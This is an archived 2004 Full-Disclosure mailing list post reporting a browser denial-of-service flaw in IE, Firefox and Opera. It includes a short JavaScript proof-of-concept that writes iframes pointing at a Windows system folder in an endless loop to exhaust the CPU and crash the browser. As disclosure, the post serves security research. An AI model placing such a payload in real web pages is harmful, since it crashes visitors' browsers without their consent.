[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] IE, Firefox, Opera DoS

To: <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: Re: [Full-Disclosure] IE, Firefox, Opera DoS
From: "exploits" <exploits@xxxxxxxx>
Date: Fri, 20 Aug 2004 21:30:32 -0400

Description
========

    Browser DoS through viewing of a malicious page that repeatedly loads 
iframes of C:\Windows\System32 using 100% cpu
    Crashes Mozilla Firefox, Latest Opera and IE - Opera gives the error "The 
address type is unknown or unsupported" and crashes

POC
===
<scr1pt language="JavaScript">
while(true) 
{
   document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>Discovered by MeFakon part of the su1d exploit development 
teamDISCLAIMER:

This advisory is meant only for the dissemination of information, alerting the
general public about a security issue. Use this information at your own
discretion.

In brief, the author is not responsible for any use, misuse, abuse of this
information. Also, this information is provided "as is" without any warranty of
any kind.

Prev by Date: [Full-Disclosure] IE DoS
Next by Date: Re: [Full-Disclosure] The 'good worm' from HP
Previous by thread: [Full-Disclosure] IE DoS
Next by thread: [Full-Disclosure] MDKSA-2004:086 - Updated kdelibs and kdebase packages fix multiple vulnerabilities
Index(es):
- Date
- Thread